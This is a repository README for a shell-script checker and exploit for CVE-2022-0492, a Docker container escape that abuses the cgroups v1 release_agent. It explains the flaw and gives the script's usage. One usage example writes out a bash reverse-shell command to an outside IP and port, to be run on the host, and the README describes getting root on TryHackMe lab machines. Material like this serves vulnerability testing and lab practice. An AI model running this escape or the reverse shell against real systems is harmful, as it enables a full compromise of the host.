/CVE-2022-0492-Docker-Breakout-Checker-and-PoC

Docker Breakout Checker and PoC via CAP_SYS_ADMIN and via user namespaces (CVE-2022-0492)

Primary LanguageShellGNU General Public License v3.0GPL-3.0

CVE-2022-0492 Docker Breakout Checker and PoC

Summary

Exploiting the vulnerability requires the attacker to have access to a Docker container running on a vulnerable system. Once exploited, the attacker can escape the container and gain complete control over the host system.

A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.

More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates. If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file, an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent file is owned by root, so only a user with root access can modify it.

Usage

# sh CVE-2022-0492.sh

[>] CVE-2022-0492 Docker Container Escape                                           V
[>] Execute this script in a Docker to check for vulnerability or to exploit it. (º___\/{
[>] Usage:
        sh CVE-2022-0492.sh    --checker                Verify if system is vulnerable.
        sh CVE-2022-0492.sh -c|--command <COMMAND>      Execute command on host machine.
        sh CVE-2022-0492.sh -h|--help                   Print the help panel.

[>] Example:
        sh CVE-2022-0492.sh --command 'bash -c "bash -i >& /dev/tcp/192.168.100.17/4444 0>&1"'

Examples

Hamlet from TryHackMe

Root user in host machine pwned by disabling UFW and then sent a reverse shell.

Misguided Ghosts from TryHackMe

Root user in host machine pwned by setting SUID to bash, also sent reverse shell.

Sources: